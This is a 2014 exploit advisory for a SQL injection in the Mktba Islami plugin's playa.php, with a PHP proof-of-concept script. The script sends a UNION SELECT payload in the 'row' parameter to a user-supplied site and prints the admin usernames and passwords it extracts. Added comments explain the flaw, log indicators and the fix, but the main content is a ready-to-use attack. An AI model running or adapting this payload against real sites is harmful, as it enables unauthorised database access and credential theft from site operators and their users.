
Mktba Islami Plugin (playa.php) SQL Injection

Author: Ashter , Published: 05-08-2014
# Exploit Title: Mktba Islami Plugin (playa.php)  Sql Injection 

# Author: Ashter . skype :asshter > fb.com/alshterr

# Software : http://www.mktba.org/

# Tested on: Windows 8.1

# Dork : there isn't dork because sites slami

# Detection date : 2014/7/28

# Exploit


<?
// Proof-of-concept for the playa.php SQL injection described in the advisory header.
// NOTE(review): the short open tag above only parses when short_open_tag is enabled.
//
// Defender summary: the request built below puts a quote character and a UNION SELECT
// into the `row` query parameter of /playa.php. That only works if playa.php places
// `row` into a SQL statement without binding or escaping it (inferred from the payload;
// playa.php itself is not shown on this page). The server-side fix is to bind `row` as
// a query parameter, or cast it to an integer, before it reaches the database.
/// Version 4.x - 7.6   (presumably the affected plugin versions, as stated by the author)

// Runs only when the POST body has a `sql` field and a non-empty `url` field.
// `url` is read without isset(), so a request lacking it raises an undefined-index notice.
if(isset($_POST['sql']) && $_POST['url'] != ""){
echo "<hr> <center>" ;
// The base URL comes straight from the request and is never validated.
$url = $_POST['url'];
// Fixed path and query string appended to the base URL. Indicators visible in it, useful
// for web-server / WAF log review:
//   - `row` carries an encoded quote (%27) followed by UNION inside a MySQL versioned comment
//   - group_concat(...) over the `name` and `pass` columns of the `user` table
//   - hex literal 0x7c6173687465727c, which decodes to "|ashter|" (the marker matched below),
//     and 0x40 ("@") used as the field separator
$ad2 = '/playa.php?catsmktba=1&&row=4%27%20/*!12345UNION*/%20SELECT%201,2,3,group_concat(0x7c6173687465727c,0x40,unhex(hex(name)),0x40,unhex(hex(pass)),0x7c6173687465727c),5,6,7,8,9%20from%20user%20+--+';
// file_get_contents() is called on caller-supplied input, so whatever host runs this script
// will fetch any URL (or local path) it is handed. `@` hides the warning on failure, in
// which case nothing further is printed.
$adminmk = @file_get_contents(($url).($ad2));
if($adminmk) {
// Looks for text between two "|ashter|" markers in the response body. The match result is
// not checked; if the marker is absent, $sec[1] is undefined and the lines below emit notices.
preg_match("#\|ashter\|(.*?)\|ashter\|#" ,$adminmk,$sec);
// The captured text starts with "@", so index 0 is empty, 1 is `name`, 2 is `pass`.
$admres = explode("@",$sec[1]);
// Values taken from the remote response are echoed into HTML without htmlspecialchars().
echo "username : $admres[1]password : $admres[2]<br align=center />";
echo "Friend :Mr.731MY and all members sec4ever.com <br align=center />";

}
}
?>

#
# sec4ever.com ,Exploit4Arab
# Friend :Mr.731MY and all members sec4ever.com
